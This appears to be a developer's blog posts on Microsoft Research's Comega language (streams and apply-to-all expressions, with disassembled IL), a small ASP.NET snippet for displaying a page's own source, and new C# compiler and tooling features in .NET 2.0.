So, what did we see so far? By declaring a stream, you're in fact declaring a class that is IEnumerable and builds its content at runtime by executing a yield statement that was translated to code inside the MoveNext method of the IEnumerable implementation of the stream type. Thus, a stream is effectively building its contents when the program is executing in an incremental fashion, whereas classic collections (arrays or System.Collection objects) are typically built upfront and then iterated over by means of the enumerator code (e.g. by using foreach).
Even more stuff ... apply-to-all-expressions
But there is more, something we call "apply-to-all-expressions". In my code samples you saw the typical usage of the foreach loop construct to iterate over the values in the collection (in this case, in the stream). Cw supports another construct that doesn't require the declaration of another variable to hold the values of the elements in the collection by means of the keyword "it". Basically what happens is that you attach a code-block to an instance of a stream and inside that codeblock the "it" keyword has the right type (that is, the type of the elements in the stream) that can be used to retrieve the value for the current iteration. Let's show you:
void UseIt(){ int* a; a = GetStream(); a.{ Console.WriteLine(it); };}
This code can of course be abbreviated to:
void UseIt(){ GetStream().{ Console.WriteLine(it); };}
Or the code block can contain multiple statements. When you go back to the IL code for this program, you'll notice two things:
The second remark is the most interesting one. So, locate the original closure and the new one and open up the new one to look at more details. In my case, the new one is called closure:561 and contains a function called "Function:544" that has the following IL code inside it:
.method privatescope instance void 'Function:544$PST06000010'(int32 it) cil managed{ .param [0] .custom instance void [mscorlib]System.Diagnostics.DebuggerHiddenAttribute::.ctor() = ( 01 00 00 00 ) .custom instance void [mscorlib]System.Diagnostics.DebuggerStepThroughAttribute::.ctor() = ( 01 00 00 00 ) // Code size 12 (0xc) .maxstack 8 IL_0000: ldarg.1 IL_0001: call void [mscorlib]System.Console::WriteLine(int32) IL_0006: br IL_000b IL_000b: ret} // end of method 'closure:561'::'Function:544'
This is where the code of the apply-to-all-expression is compiled to. One parameter is passed to the method, containing the strongly typed "it" value. The caller function has changed a little too, in order to call this function:
.method public hidebysig static void Main() cil managed{ .entrypoint // Code size 99 (0x63) .maxstack 9 .locals init (class Streams/'closure:561' V_0, class System.Collections.Generic.'IEnumerable' V_1, int32 V_2) IL_0000: newobj instance void Streams/'closure:561'::'.ctor$PST0600000F'() IL_0005: stloc.0 IL_0006: ldloc.0 IL_0007: ldc.i4.1 IL_0008: ldc.i4.5 IL_0009: call class System.Collections.Generic.'IEnumerable' Streams::GetStream(int32, int32) IL_000e: stfld class System.Collections.Generic.'IEnumerable' Streams/'closure:561'::p$PST04000005 IL_0013: ldloc.0 IL_0014: ldfld class System.Collections.Generic.'IEnumerable' Streams/'closure:561'::p$PST04000005 IL_0019: stloc.1 IL_001a: ldloc.1 IL_001b: brfalse IL_005c IL_0020: ldloc.0 IL_0021: ldloc.1 IL_0022: callvirt instance class System.Collections.Generic.'IEnumerator' System.Collections.Generic.'IEnumerable'::GetEnumerator() IL_0027: stfld class System.Collections.Generic.'IEnumerator' Streams/'closure:561'::'foreachEnumerator: 2$PST04000006' IL_002c: ldloc.0 IL_002d: ldfld class System.Collections.Generic.'IEnumerator' Streams/'closure:561'::'foreachEnumerator: 2$PST04000006' IL_0032: brfalse IL_005c IL_0037: ldloc.0 IL_0038: ldfld class System.Collections.Generic.'IEnumerator' Streams/'closure:561'::'foreachEnumerator: 2$PST04000006' IL_003d: callvirt instance bool System.Collections.Generic.'IEnumerator'::MoveNext() IL_0042: brfalse IL_005c IL_0047: ldloc.0 IL_0048: ldfld class System.Collections.Generic.'IEnumerator' Streams/'closure:561'::'foreachEnumerator: 2$PST04000006' IL_004d: callvirt instance int32 System.Collections.Generic.'IEnumerator'::get_Current() IL_0052: stloc.2 IL_0053: ldloc.0 IL_0054: ldloc.2 IL_0055: call instance void Streams/'closure:561'::'Function:544$PST06000010'(int32) IL_005a: br.s IL_0037 IL_005c: call string [mscorlib]System.Console::ReadLine() IL_0061: pop IL_0062: ret} // end of method Streams::Main
Constructing new streams based on existing streams
Based on an apply-to-all-expression you can build up a new stream, that's built by converting the type or by calling some method in order to make a conversion. A basic sample looks like this:
string* newStream = GetStream().{ return it.ToString() };
This will be created in a similar fashion as the previous example. This time another function will be created for the apply-to-all-expression that performs the return it.ToString(); code. But there is more going on, because we are declaring another stream type based on a string this time. This results in another stream class being created, nested inside the other stream class:
.class auto ansi sealed nested private specialname 'closure:1241' extends [mscorlib]System.Object implements [mscorlib]System.Collections.IEnumerable, System.Collections.Generic.'IEnumerator<System.String>', [mscorlib]System.Collections.IEnumerator, [mscorlib]System.IDisposable, System.Collections.Generic.'IEnumerable<System.String>'{} // end of class 'closure:1241'
Inside the MoveNext method you'll find code that calls the conversion function this time:
.method public virtual instance bool MoveNext() cil managed{ // Code size 118 (0x76) .maxstack 10 .locals init (class Streams/'closure:561'/'closure:1241' V_0, class System.Collections.Generic.'IEnumerable' V_1, int32 V_2, int32 V_3) IL_0000: ldarg.0 IL_0001: stloc.0 IL_0002: ldarg.0 IL_0003: ldfld int32 Streams/'closure:561'/'closure:1241'::'current Entry Point: ' IL_0008: switch ( IL_0015, IL_0072) IL_0015: ldloc.0 IL_0016: ldfld class System.Collections.Generic.'IEnumerable' Streams/'closure:561'/'closure:1241'::Collection$PST04000009 IL_001b: stloc.1 IL_001c: ldloc.1 IL_001d: brfalse IL_0074 IL_0022: ldloc.0 IL_0023: ldloc.1 IL_0024: callvirt instance class System.Collections.Generic.'IEnumerator' System.Collections.Generic.'IEnumerable'::GetEnumerator() IL_0029: stfld class System.Collections.Generic.'IEnumerator' Streams/'closure:561'/'closure:1241'::'foreachEnumerator: 3$PST0400000D' IL_002e: ldloc.0 IL_002f: ldfld class System.Collections.Generic.'IEnumerator' Streams/'closure:561'/'closure:1241'::'foreachEnumerator: 3$PST0400000D' IL_0034: brfalse IL_0074 IL_0039: ldloc.0 IL_003a: ldfld class System.Collections.Generic.'IEnumerator' Streams/'closure:561'/'closure:1241'::'foreachEnumerator: 3$PST0400000D' IL_003f: callvirt instance bool System.Collections.Generic.'IEnumerator'::MoveNext() IL_0044: brfalse IL_0074 IL_0049: ldloc.0 IL_004a: ldfld class System.Collections.Generic.'IEnumerator' Streams/'closure:561'/'closure:1241'::'foreachEnumerator: 3$PST0400000D' IL_004f: callvirt instance int32 System.Collections.Generic.'IEnumerator'::get_Current() IL_0054: stloc.2 IL_0055: ldloc.2 IL_0056: stloc.3 IL_0057: ldarg.0 IL_0058: ldloc.0 IL_0059: ldfld class Streams/'closure:561' Streams/'closure:561'/'closure:1241'::Closure$PST0400000A IL_005e: ldloc.3 IL_005f: call instance string Streams/'closure:561'::'Function:595$PST06000014'(int32) IL_0064: stfld string Streams/'closure:561'/'closure:1241'::'current Value' IL_0069: ldarg.0 IL_006a: ldc.i4.1 IL_006b: stfld int32 Streams/'closure:561'/'closure:1241'::'current Entry Point: ' IL_0070: ldc.i4.1 IL_0071: ret IL_0072: br.s IL_0039 IL_0074: ldc.i4.0 IL_0075: ret} // end of method 'closure:1241'::MoveNext
Remark the nesting depth and the call to the function to perform the conversion, which looks pretty simple:
.method privatescope instance string 'Function:595$PST06000014'(int32 it) cil managed{ // Code size 17 (0x11) .maxstack 3 .locals init (string V_0, string V_1) IL_0000: ldarga.s it IL_0002: call instance string [mscorlib]System.Int32::ToString() IL_0007: stloc.0 IL_0008: br IL_000d IL_000d: ldloc.0 IL_000e: stloc.1 IL_000f: ldloc.0 IL_0010: ret} // end of method 'closure:561'::'Function:595'
I'd recommend to mess around in the IL a little more to see what's going on if you're really interested in this stuff. Once you understand the basic tricks, it's fairly easy to understand what's the magic stuff all about.
More samples?
Comega comes with a bunch of examples of streams that are interesting to check out further. I strongly recommend to ildasm the generated code to get a better image of the overall structure and ideas.
In the upcoming days/weeks I'll be posting more about Comega on an (ir)regular basis. This first post is meant as a general introduction in the Comega project.
What is it?
Comega (abbreviated as Cw, w standing for the Greek letter "omega") is a research programming language that is created by Microsoft Research and contains a bunch of new language features that will likely (partially) make it into C# v3.0. The homepage of Cw can be found on.
How to get it?
You can get the "Comega compiler preview 1.0.2" on the website mentioned above. It will integrate with Visual Studio .NET 2003 and it will install some samples too to introduce the language.
Why a new language?
Well, it's not really a new language, it's rather a collection of new language features. Summarized in one sentence, Cw is focusing mainly on briding the gap between various data models (formerly known as X# or Xen), including the relational model, the object model and XML. The overall idea is to extend C# with language constructs that make it easier to program against structured relation data and semi-structured XML data. But there is more than just this:
Interesting kick-off readings include and which was released to the web very recently.
Check out my blog the upcoming days/weeks for more information to come and some samples of Comega.
UPDATE: All my Comega posts will be listed on too.. :-))))
Question: How to make a page that can show itself (that is, the source code) when creating samples?
Answer: Take a look at. Basically the code is just as simple as this:
string f = Server.MapPath(Request.Path);using(StreamReader r = new StreamReader(f)){ code.Text = Server.HtmlEncode(r.ReadToEnd());}Which you can put in an .ascx too, in order to display the .aspx that contains it (cf. Request.Path). So, it becomes as easy as doing a <%@ Register.
Let's try to bypass the hype of the VS2005 tools and show you guys some of the enhancements on the field of csc.exe, the C# compiler, in .NET v2.0.
Another nice one - Conditional compile symbols (works in C# 1.x too, but I'd like to mention it because I like it so much :-))You know #if and #endif, the preprocessor directives that can be used to include code (or not) based on some preproc "variable"? People who've done C and C++ certainly know this (#include, #define, #ifdef, etc), and it's available in C# too. However, in order to set such a preproc variable, you needed to jump in your code file in order to define the variable using the #define instruction. Let's give an example://compile with csc /define:WORLD Hello.cs//or add #define WORLD in the codeusing System;class Hello{ public static void Main() {#if WORLD Console.WriteLine("Hello World");#endif }}
Use of targets file (MSBUILD)
In the .NET Framework installation folder (Windows\Microsoft.NET) you'll now find a file called Microsoft.CSharp.targets which contains the XML description of the build process and everything around it, as used by MSBUILD and the tools. In this file, you'll find a tag, setting various variables on the "attributes of the compiler" (which are mapped to flags when using the command-line compiler directly of course). If you want to compare this system to existing similar technologies, you can compare it with makefile and ant-things, but much smarter :-). Note there is a Microsoft.Common.targets file too, that is included in the CSharp targets file. A full elaboration of these files would be outside the scope of this post, but be sure to check out these files (also when you're interested in ClickOnce, as there are targets such as "ComputeClickOnceManifestInfo" included in this file to support ClickOnce (which means once again, that you can do ClickOnce deployment without using the VS2005 tools directly).
ILdasm - No more tricks
Few people knew it, the /adv flag of ildasm.exe v1.x. It's not in the help, it's not in the /? information of the tool. The idea was pretty simple, use ildasm /adv and you get more menus, to view the PE (portable executable) and CLR headers of a file, statistics, etc. Now, it's there by default, no more /adv flag needed.
ILasm would bring us too far in the context of this post, but if I find the time, I'll write something about it. One of the nice new additions is the generation of Edit-and-Continue deltas for E&C support. This proves that the Edit & Continue support is on the level of the .NET Framework (IL-code level) and thus it can be supported for any language (E&C support is coming indeed for both VB and C#).
Ngen - extra options
Ngen (native image generator) has some new options, for example, to defer the creation of native images till the computer is idle (especially interesting for large assemblies). Additionally, the various actions are better described right now (install, update, finish, uninstall, display).
What about VB?
Well, one of the remarkable new features is the support for documentation generation using the vbc.exe compiler (and in the VB language generally spoken). This was already supported on csc (using the /doc flag), and now it's there on VB too. As I'm not a huge VB user (anymore), I can't really tell you everything about the new VB features, but there are various sources around the net to tell you more about this.
Let's stop for now; I'll come back to this topic later on. | http://blogs.bartdesmet.net/blogs/bart/archive/2005/03.aspx | CC-MAIN-2018-05 | refinedweb | 7,313 | 58.99 |
Rense.com
Burien Answers More
CAFR Questions
From Walter Burien <CEVI@aol.com>
7-23-00
In a message dated 7/22/00 dade@bigcountry.net writes:
Walter,
In Texas Codes, Statutes, Legislation on Local Government Code Sec. 351.145
C5) amount of the balances expected at the end of the year in which the budget is being prepared; C6) estimated amount of revenues and balances available to cover the proposed budget; and C7) estimated tax rate that will be required.
Talked to ex-Attorney General and he said it is a can of worms to be opened. There should not be any large amounts left over from the year that is not (C6) put into the new budget to reduce the budget for the new year. Example: l million revenue excess would be deducted from (say) 20 million new budget then 19 million should be taxed the people. _____
Carl: Keep in mind that revenue held under the "Budgetary Basis" is subject to very conservative investment laws, i.e. treasury bill, triple rated bonds, etc. (4 to 5.75% annual return). Investment funds now or in the past 35 years funneled off of the "Budgetary Basis" are in most cases not subject to the those investment restriction, and will grow at extraordinary rates of return with compounded investment yields if invested in the same fashion as pension funds.
The current government pension fund style type management has yielded from 15 to 23% per year over the last 7 years!
One tactic being used is Bond issuance's, issued by local governments. Say a bond issuance for a 150 million dollar road project (or school district, or university, or prison system, or land preservation, etc., etc.,etc.) with an annual liability of say 4.2% of which that 4.2% or 6.3 million dollars, plus percentage of the principle payoff a year is paid for under the budget. The tactic being used is that they will get the 150 million, allocate say 10 million aplied up front to jump start the project. The remaining 140 million is held by a "specialized" financial holding company which will invest the 140 under pension fund style management accomplishing say, a 16% rate of return or a net 11.8% return (in the event, if for some possible ethical reason the 4.2% return is deposited back to the general purpose operating "Budget" ).
The project will be delayed for 3 to 4 years. Now it proceeds with another 30 million applied, 100 million remains on the specific accounting for the "Budget" from the budgeted bond issuance. Delays continue and the project competes after an additional 8 years. Let's say an average of 12.5 million is allocated over the next 8 years using up the remaining 100 million from the bond issuance. Now the road project is completed 12 years after it was started. The 150 million bond issuance obtained and allocated under the Budget is depleted.
Now lets see what we have here over the 12 years.
1. a completed road project.
2. a 150 million dollar debt with the 4.2% return, the debt is now 150 + 75.6=225.6 minus the offset from payments out of the budgetary basis. Debt continues until paid off from the budgetary basis. Total principle + return on a 20 year bond issuance, you figure that one out.
3. The financial holding company on the other hand: Let's see, 140 million at a net 11.8% return for 4 years compounded = 218.72 million dollars. 30 million is withdrawn bring down the balance to: 188.72 million dollars.
Year 5 = 188.72 x 11.8% = 210.99 - 12.5 = 198.49 Year 6 = 198.49 x 11.8% = 221.91 - 12.5 = 209.41 Year 7 = 209.41 x 11.8% = 234.12 - 12.5 = 221.62 Year 8 = 221.62 x 11.8% = 244.77 - 12.5 = 235.27 Year 9 = 235.27 x 11.8% = 263.03 - 12.5 = 250.53 Year 10 = 250.53 x 11.8% = 280.10 - 12.5 = 267.60 Year 11 = 267.60 x 11.8% = 299.17 - 12.5 = 286.67 Year 12 = 286.67 x 11.8% = 320.50 - 12.5 = 308.00 million dollar
Things now get better in year 13. The 150 million allocated for the road project is spent. 12.5 million is not deducted, the bond is being paid for by the budgetary basis. (taxation) The 308 million dollars held by the financial holding company will now obtain the full yield of 16% from this point forward.
Year 13 = 308.00 x 16% = 357.28 million dollars, etc., etc., etc.
*********************************************
NOTE: the above is for example purposes only. Rates of return vary. The model used is valid being that government pension fund management has accomplished an average rate of return of over 16% for the last 8 years. EXP: AZ-1998 16.85%, WA-1999 22%
SPECIAL NOTE: In many cases now, States are creating their own financial authorities and using their own investment funds, to fund their own bond issuances.
EXAMPLES: Arkansas Development Finance Authority, Missouri Finance Authority, etc., etc., etc.
VERY SPECIAL NOTE: If the 12.5 million dollars annually for 8 years and the 30 million dolars after 4 years was not deposited back to the general purpose operating "Budget" the above example would have a substantially larger ending figure after 12 years.
VERY VERY SPECIAL NOTE: You now know why creating more debt for the public under the "Budget" can be a VERY, VERY profitable proposition for the "Boys" running the show.................... The same overfunding applies to Government Pension fund management to allow the corporate empire to grow outside of the "Budgetary Basis". This being done outside of the publics view, as the annual "Budget" is rammed down the public's throat, with no mention of the "OTHER" revenue and investments coming from "OTHER" sources outside of the "Budgetary" basis. WAKE UP CALL!! CAN YOU SMELL THE COFFEE YET?
It's time to get six inches from their face saying "This is the way business as usual will be conducted from this point forward, IF YOU WANT TO SURVIVE" i.e. phase out all taxation mandating operations run from the return on the investment funds, "ALL INVESTMENT FUNDS" generating surpluses, not those specifically under the "ANNUAL BUDGETARY BASIS." I emphasize the point of downsizing Government opperations also.
The public has one advantage, and one advantage ONLY. We outnumber the "Boys" by about 400 to 1.
The Judiciary is part of the game, the syndicated Media is part of the game, the local polititions are part of the game, the investment, insurance and banks are part of the game. And what a big game it is, 60 trillion dollar game of composite government wealth. Run and managed by some of the sharpest crakers on the face of the planet, having an armed police force to maintain the game, and an organizational structure uneaqualed in this planets history.
If 10% of the public gets a grasp on the situation, that makes it 40-1odds. Or "GOOD ODDS" to make it happen. If the public makes it happen, the investment, insurance and banks still manage the revenue and investments. No problem there, as long as they continue the same investment performance now applied for the public's benefit. The effect on the public, no problem there. Taxation is phased out and eliminated, and a possible dividend return can come back annually to the pubic if the "New" group of "Boys" operating the corporate government are doing a good job. At least the public will have something to gauge performance on in their determination on who gets the buts kicked out on the street come election time. Or if necessary by indictment or recall. No more kissing babies and telling old folk tales, or charming personalities to appease the masses to get the vote. The only primary factor looked at will be comparison performance, coast to coast with the public looking at their performance for the phasing out of taxation and then, the inevitable dividend return as the public allows them to continue the "New" corporate government "Business as Usual."
No other option for effective action will prevail. Personally, I would prefer armed conflict and the loss of my life if necessary over the current empire building and financial rape taking place today in this country, if in the event business as usual continues "as is", unabated, we will maintain being the food for the well developed parasitic nature of unrestrained government growth and the ever increasing forced subservience "naturally" coming therefrom. The hour is late, and the call mostly unheard!
_____
There is a group waiting for the AG's letter with the facts, then they are going to demand the County Judge etc. to resign or go to court.
What have you heard about this law that must be in every State's Law on organizing City, County, etc. concerning proper use of the people's money.
CAFR reports will start to look real interesting to many people. Gov. Corporation should not become banks.
Carl
This Site Served by TheHostPros | https://rense.com/general2/cafrm.htm | CC-MAIN-2021-43 | refinedweb | 1,532 | 66.03 |
Localizations (messages) plugin
Dependency :
compile ":localizations:1.4.4.14"
Summary
This plugin will pull i18n definitions from the database rather than from the standard properties files in the i18n folder.It will do the following:
In addtion the plugin also has these added features to help you:
Asumptions:
- update i18n messages
- A cache for increased speed
- A JSONP action which can be useful in client-side templating.
- Your database supports unicode
- Your application has a layout called main
Description
Localizations Plugin
DescriptionThe localizations plugin alters Grails to use the database as its means of internationalization rather than message bundles (property files) in the i18n directory of your application. All property files in the i18n directory of your application (but not subdirectories of i18n) are automatically loaded in to the database the first time a message is requested after the plugin is installed. There is also an import facility (at a URL similar to) to load subsequently created property files - often the result of later installation of plugins. A 'message' method is added to all domain classes and service classes as a convenience. An 'errorMessage' method is added to all domain classes that can set an error message on either the domain as a whole or on a particular property of the domain. A localizations controller and CRUD screens are included with the plugin. The screens assume you are using a layout called main. Your database must be configured to allow the use of Unicode data for this plugin to work.
InstallationExecute the following from your application directory:
The plugin creates one domain called Localization. It also copies a properties file called localizations.properties to the i18n directory of your application overwriting any file of the same name. When the plugin is first used, it will attempt to load the contents of any and all properties files in the i18n directory (but not subdirectories of i18n) of your application and load them in to the database. Per standard Grails, the files are read assuming UTF-8 encoding. After installation of the plugin, the Localization table in your database should have an index comprising of the two columns 'code' and 'loc' (which are a unique combination) but since Hibernate may or may not create this index, you are advised to check it exists otherwise performance may suffer. By default, the plugin uses a 'least recently used' cache for fast repeated access. The default maximum cache size is 128kb, but memory is only used as is needed. If you wish to alter the maximum size (amount of memory) used by the cache, you may do so by making an entry similar to the following in your Config.groovy file:
grails install-plugin localizations
The above example Config.groovy entry increases the cache size to 512kb. Setting the cache size to zero disables caching with a consequent increase in databases activity. You can check the cache statistics using a URL such as:. Note that you may have to refresh your browser window to see the most up to date statistics.
localizations.cache.size.kb = 512
UsageThe components of the plugin are in a package called org.grails.plugins.localization and any class that wishes to access the components directly must include the following:
The localizations plugin adds a message method to each domain class and to each service class, for convenience. It also adds an errorMessage method to each domain class for setting either domain-wide or property-specific errors on the domain. These error messages are ususally displayed in a GSP using the normal <g:renderErrors.../> tag.
import org.grails.plugins.localization.*
MessagesThe following example can be used in a controller, a service, a domain class or a tag library (although you may preceed it with g. within a tag library). As you can see, it is a completely standard 'message' method call:
Within a GSP you again use a completely standard message tag. For example:
def msg = message(code: "my.code", args: [arg1, arg2], default: "Missing message", encodeAs: "HTML")
All other internationalizations, such as select tags, renderErrors, flash messages etc should continue to work without change - except that their localized messages will now come from the database rather than message bundles.
<g:message
ErrorsDomain objects have an errorMessage method available which can set an error message either on the domain object as a whole, or on a specific property (field) within the domain object. The parameters to the errorMessage method are identical to those of the message method described previously. If you wish to make the error message specific to a field within the domain object, then an additional 'field' parameter is available. An example of setting a field error within a controller, might be as follows:
An example of setting a domain-wide error message from within, say, the custom validator method of a domain class definition might be similar to the following:
book.errorMessage(field: "title", code: "my.code", args: [arg1, arg2], default: "Missing message")
Note that the errorMessage method also returns the message it attached to the domain object, which can be useful for debugging and/or logging:
… validator: {val, obj -> obj.errorMessage(code: "my.code", args: [arg1, arg2], default: "Missing message")}
log.debug(book.errorMessage(code: "my.code")) | http://www.grails.org/plugin/localizations | CC-MAIN-2014-15 | refinedweb | 871 | 50.87 |
Atelier provides several ways to navigate to classes, class members, and other important components of your source code.
The Outline view shows the
logical structure of the class or routine file selected in the Atelier editor. You can navigate to an item in the editor by selecting it in the Outline view. When you edit a file, the Outline view reflects your position in the editor and updates as you edit. The following image shows the outline view
to the right of the editor area. The user has just navigated to
the method
Greeting by clicking on it in the outline view.
To open the Outline view, select
Window > Show View > Other... > General > Outline from the main menu, or select Show In > Outline in the Editor context menu.
The Quick Outline provides essentially the same information as the Outline view, with a lighter-weight interface. Press CTRL+O or select Quick Outline from the editor context menu to open an in-place outline of the content of the source file. Press CTRL+O again to show inherited members. You can navigate to the definition of any item in the list by clicking on an it. The following image shows the quick outline dialog with inherited members visible:
Atelier provides an initial implementation of the Eclipse Type Hierarchy view. Select a class file in the Atelier Explorer, right-click to open the context menu and select Open Type Hierarchy:
The left side of this view shows you the super classes of the selected class. The right side shows class members:
Select the Lock View and Show Members in Hierarchy button in the toolbar of the member area, then select
run(). The view now shows all the types that implement
run().
In the Type Hierarchy view select
PrintMessage, right-click and select Focus On 'PrintMessage' from the context menu. The Type Hierarchy view now shows the hierarchy for
PrintMessage. You can use the Previous Type Hierarchies button (
) button to return to a hierarchy you have viewed prevously.
Double-clicking on an item in the Type Hierarchy view opens the class file in the editor. Double-clicking on a class member opens the corresponding file at the declaration for that member.
The Go to Line... command lets you navigate to a specific line in a file open in the editor. Open the dialog by selecting Navigate > Go to Line... from the main menu, or use the keyboard shortcut CTRL+L. Enter a line number or tag, plus an optional offset. In a class file, a tag can be the name of a class member. In a routine file, it can be a label. The offset specifies the number of lines past the location of the label. For example, the tag plus offset in the following screen shot specifies line 31, 5 lines past the location of
TopCategory.
When you type a label, a list opens that is filtered by what you have typed:
Select View Other Code from the editor right-click context menu to open intermediate files
created during compilation so you can view the generated code. You can also click the View Other Code toolbar button
.
Intermediate files are created on the server during compilation, and they are stored on the server. Such
files open with a background color that indicates they have been opened on the server in read-only mode.
If you need to edit an intermediate file, you must first copy it to the project in the workspace, using the
Copy to Project command on the Sever Explorer context menu.
The Compilation preference Keep generated source code (k) must be selected in order to retain the generated files. See the topic on Compilation Preferences. It is selected by default.
Click on the name of a class, method, or property. You can then right-click to open a context menu and select Open Declaration, which navigates to the declaration of the object, opening the file if necessary.
Select Navigate > Open Atelier Resource
from the main menu, click on the icon
in the main toolbar, or use the keyboard shortcut CTRL+SHIFT+T. The dialog box that opens lets you search for classes
or routines in a namespace on a server connection and in Atelier projects open in the workspace.
Use the downward-facing triangle in the upper-right corner of the dialog to view a drop-down list of options:
The first items in the list control view and scope:
The ramaining items list namespaces available on existing connections. Select the connection/namespace pairs that you want to search.
The dialog initially lists all classes and routines in the selected namespaces and in any projects open in the workspace. You can filter the list by typing in the selection field. You can enter a class or routine name, using wildcard characters ? for any single character and * for any string. The following screen shot shows a filtered list.
Select an item and click OK to open it in the editor.
You can use the Back, Forward, and Last Edit Location items on the Navigate menu
to move between locations in code files you have visited. You can also use the forward
, back
and last edit location
buttons on the main toolbar.
You can search on the server using the Atelier search tab. Click on an item in the results list to navigate to that code on the server. See Atelier Search Tab.
The Open Resource dialog allows you to browse the workbench for a file to open in an editor. | https://docs.intersystems.com/atelier/latest/topic/com.intersystems.atelier.help/html/reference/view-code-navigation.html | CC-MAIN-2019-18 | refinedweb | 920 | 63.59 |
J2ME Draw Triangle
J2ME Draw Triangle
As you already aware of the canvas class and it's use in J2ME application, we
are using canvas class to draw the triangle on the screen. In this example
Simple Line Canvas Example
Simple Line Canvas Example
This is a simple example of drawing lines using canvas class in J2ME. In this example we are
creating three different lines at different
Draw arc in J2ME
Draw arc in J2ME
The given example is going to draw an arc using canvas class of J2ME. You can
also set a color for it, as we did in our example.
Different methods
Rectangle Canvas MIDlet Example
Rectangle Canvas MIDlet Example
The example illustrates how to draw the different types of rectangle in J2ME.
We have created CanvasRectangle class in this example
J2ME Canvas Example
J2ME Canvas Example
A J2ME Game Canvas Example
This example illustrates how to create a game using GameCanvas class.
In this example we are extending GameCanvas class
Draw Line in J2me
Draw Line in J2me
In this example we are going to show you how to draw a line using J2ME.
Please... and class to draw a line.
Basically in J2ME, Canvas class is used to draw
Text Example in J2ME
Text Example in J2ME
In J2ME programming language canvas class is used to paint and draw... a canvas class to
draw such kind of graphics in the J2ME application.
J2ME Source
Draw Font Using Canvas Example
Draw Font Using Canvas Example
This example is used to draw the different types of font using Canvas class.
The following line of code is used to show the different style
Draw String Using Canvas
Draw String Using Canvas
This example is used to draw string on different location which is shown in
figure. The given code is used to show, how to draw string at different
J2ME Draw String
J2ME Draw String
... on the
screen. Here in this example, we are going to show the string in J2ME. For that
we have created a a class called GraphicsCanvas class that extends to the Canvas
J2ME Canvas Repaint
J2ME Canvas Repaint
In J2ME repaint is the method of the canvas class, and is used to repaint the
entire canvas class. To define the repaint method in you midlet follow
Line Canvas MIDlet Example
Line Canvas MIDlet Example
In this example, we are going to draw to different lines which cross...;CanvasCrossLine"
class created by us extends the Canvas class to draw both
Draw Rectangle in J2ME
Draw Rectangle in J2ME
... are used to draw a rectangle using J2ME language:
g.setColor (255, ... it to create rectangle and to set the
color of canvas and draw line or box.
Image Icon Using Canvas Example
Image Icon Using Canvas Example
This example is used to create the Image on different location using Canvas
class. In this example to create the image we are using Hi,
In my j2me application I have used canvas to display an image in fullscreen.In the image there are four points( rectangular areas ). Now I...?
give a sample example.
Please help me giving some idea.
Thanks in advance
Line in J2ME |
Draw Rectangle in
J2ME | Draw Font
Using Canvas Class J2ME |
Draw String Using
Canvas J2ME |
Interactive, Non-Interactive Gauge Class... J2ME |
Image Icon
Using Canvas J2ME |
Draw Clip Area Using
Canvas
Draw Clip Area Using Canvas
Draw Clip Area Using Canvas
This Example is going to draw a clip with SOLID line. In
this picture only solid line show the clipping area. To draw a solid line, we
have
J2ME Canvas KeyPressed
in J2ME using
canvas class. After going through the given example, you will be able to show
different output against different keypressed actions. This example...
J2ME Canvas KeyPressed
J2ME Draw Triangle, Rectangle, Arc, Line Round Rectangle Example
J2ME Draw Triangle, Rectangle, Arc, Line Round Rectangle Example
In this serious of J2ME... to use the canvas class to draw all the graphic or image. We can
call the canvas
Image Icon Using Canvas Example
Image Icon Using Canvas Example
This example is used to create the Image on different location using Canvas
class. In this example to create the image we are using
Canvas
perfect number - Java Beginners
perfect number An integer number is said to be a perfect number.... For example, 6 is a perfect number because 6 = 1+2+3. Write a method perfect that determines if parameter number is a perfect number. Use this method
j2me
j2me Hi,
how can add image in forms but using lick a button. does not using canvas in j2me for Symbian development
J2ME Timer Animation
and implement
it in the canvas class. In this Tutorial we have given you a good example, which
helps you to understand using of
timer class for drawing the canvas... J2ME Timer Animation
J2ME
J2ME how to use form and canvas is same screen in J2ME
Hi Friend,
Please visit the following link:
Thanks
Align Text MIDlet Example
Align Text MIDlet Example
With the help of the canvas class, we can draw as many as graphics we... in this small j2me
example..
int width = getWidth(); give a sample example for using key listener in j2ME for developing Symbian
J2ME Key Codes Example
J2ME Key Codes Example
... key
pressed on the canvas. In this application we are using the keyPressed... is created in the KeyCodeCanvas class, in which we inherited
the canvas class
j2me
j2me in j2me i want to know how to acess third form from the second form.... so need a program for example with more thaan three form
J2ME Vector Example
J2ME Vector Example
.... In this
example we are using the vector class in the canvas form. The vector class...;unconditional) {}
}
class VectorCanvas extends Canvas{
J2ME Tutorial
;
J2ME Canvas Example
This example illustrates how to create a game using...
In this example we are going to show you how to draw a line using J2ME.
Please go...
about creating rectangles in J2ME.
Draw Font Using Canvas
J2ME Image Example
J2ME Image Example
In this application we are going to simply create an image using canvas... in the class. When
the run() method is invoke, which repaint the canvas
List in J2ME
List in J2ME
J2ME Canvas List Example will explain you, how to create list of items. In
this example we are going to create a simple list of text, that will show
Draw a Flowchart
canvas. To
draw the terminator box, process box decision box in flowchart, we have... Draw a Flowchart
This section illustrates you how to draw a Flowchart to compute
Creating Canvas Form Example
Creating Canvas Form Example
This example shows that how to use the Canvas Class in a Form. In this example
we take two field in which integer number passed from the form
Co-ordinates MIDlet Example
Co-Ordinates MIDlet Example
In this example the CoordinatesCanvas class extends the Canvas
class to draw the image and fill color as given below in the figure
Java draw triangle draw method?
Java draw triangle draw method? hi
how would i construct the draw method for an triangle using the 'public void draw (graphics g ) method? im... a rectangle and this works for a rectangle:
public void draw(Graphics g
Graphics MIDlet Example
;
This is the another graphic example, where we are going to draw... of graphics in
J2ME we use MIDlet's. In the example we have created PacerCanvas class that extends the canvas class to draw this
graphics.
Please find
How to draw a television
How to draw a television
Try to draw a television with this example.
New File: Take a new file with required
size.
Rectangle Shape: First draw a Rectangle shape
with black color by using Rectangle tool (U
J2ME Frame Animation
it in the canvas class.
In this example we are creating a frame using Gauge class. When the command
action call the "Run" command ,which display the canvas... J2ME Frame Animation
j2me and blutooth
j2me and blutooth how to pass canvas object between two devices using blutooth
J2ME Display Size Example
J2ME Display Size Example
In the given J2ME Midlet example, we are going to display... of the screen, we have used getwidth and getheight method in
our example.
Source Code
Immutable Image using Canvas Class
Immutable Image using Canvas Class
This is the immutable image example which shows how to create the immutable
image using canvas. In this example ImageCanvas class
Lottery Draw - Java Beginners
Java lottery program Please send me an example for the Lottery Draw application in Java.Thanks in advance
Canvas Layout Container in Flex4
of Canvas Layout
Container is <mx:Canvas>.
In this example the colored area shows the Canvas
container.
Example:
<?xml version="1.0...Canvas Layout Container in Flex4:
The Canvas layout Container is used
draw this pattern of swastic.
draw this pattern of swastic. last time i had asked swastic pattern... ,
example
*
**
***
****
*****
